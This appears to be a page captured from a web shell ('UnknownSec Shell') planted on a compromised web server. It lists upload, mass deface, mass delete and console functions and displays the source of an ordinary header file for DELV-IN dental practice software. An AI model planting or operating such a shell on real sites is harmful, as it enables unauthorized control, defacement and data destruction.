shell bypass 403
UnknownSec Shell
:
/
var
/
www
/
html
/
includes
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
public_header.php
<!DOCTYPE html> <head> <title>DELV-IN Dental Practice Software</title> <meta http-equiv="content-type" content="text/php" charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel='shortcut icon' href="views/images/delvin.ico"> <link rel='stylesheet' href="views/styles.css" type='text/css'> <meta name='keywords' content='DELVIN, DELV-IN, Dentist, Dental, Dental Practice, Profitability, Profitable, Tool, Time clock, Human resources, staff, employee, cloud-based software, Canada'> <meta name='description' content='DELV-IN is cloud-based software for Dental Practices to manage payroll & staff. It provides real-time data that shows where and how profitability can be improved.'> <script language="javascript"> function load_page(selected){ page = selected.options[selected.selectedIndex].value; document.location = page + ".php"; } function show_div(id){ document.getElementById(id).style.display = 'block'; } function hide_div(id){ document.getElementById(id).style.display = 'none'; } function check_menu(){ var w = window.innerWidth; if (w > 667){ document.getElementById('menu_pages').style.display = 'block'; } else { document.getElementById('menu_pages').style.display = 'none'; } } </script> </head> <body onresize="check_menu();"> <div class='wrapper'> <div class='contact_login_strip' > <div class='contact_strip_element left'> <a href='demo.php' class='contact_but'>Request a Demo</a> </div> <div class='contact_strip_element right'> <a href='https://secure.delv-in.com' target='_blank' class='client_login_but'>Client Login</a> </div> </div> <div class='main_container'> <div class='menu_strip'> <div class='col-2'> <a href='index.php'><img src='views/images/DELV-IN-logo.png' alt='DELV-IN' class='logo'></a> </div> <a href='#' onclick='show_div("menu_pages")'> <div id='menu_icon' class='menu_icon'> <div></div> <div></div> <div></div> </div> </a> <div id='menu_pages' class='menu_pages'> <div class='menu_item menu_is_for'> <span class='pad_right_2'>is for: </span> <select name='is_for' onchange='load_page(this);'> <?php $is_for_array = array('index'=>'--select--', 'dentists'=>'Dentists', 'consultants'=>'Consultants', 'managers'=>'Managers', 'team'=>'The Team'); foreach ($is_for_array as $key => $option){ echo " <option value='".$key."'"; if (strpos($_SERVER['PHP_SELF'], $key)){ echo " selected"; } echo ">".$option."</option> "; } ?> </select> </div> <div id='X_but' class='X_but'><a href='#' onclick='hide_div("menu_pages")'>[X]</a></div> <div class='menu_item menu_plan'><a href='plan.php'>Choose Your Plan</a></div> <div class='menu_item menu_why'><a href='why.php'>Why DELVIN?</a></div> <div class='menu_item menu_news'><a href='news.php'>Blog</a></div> <div class='menu_item menu_about'><a href='about.php'>About Us</a></div> </div> <!-- end menu_pages --> </div> <!-- end menu_strip -->
© 2026 UnknownSec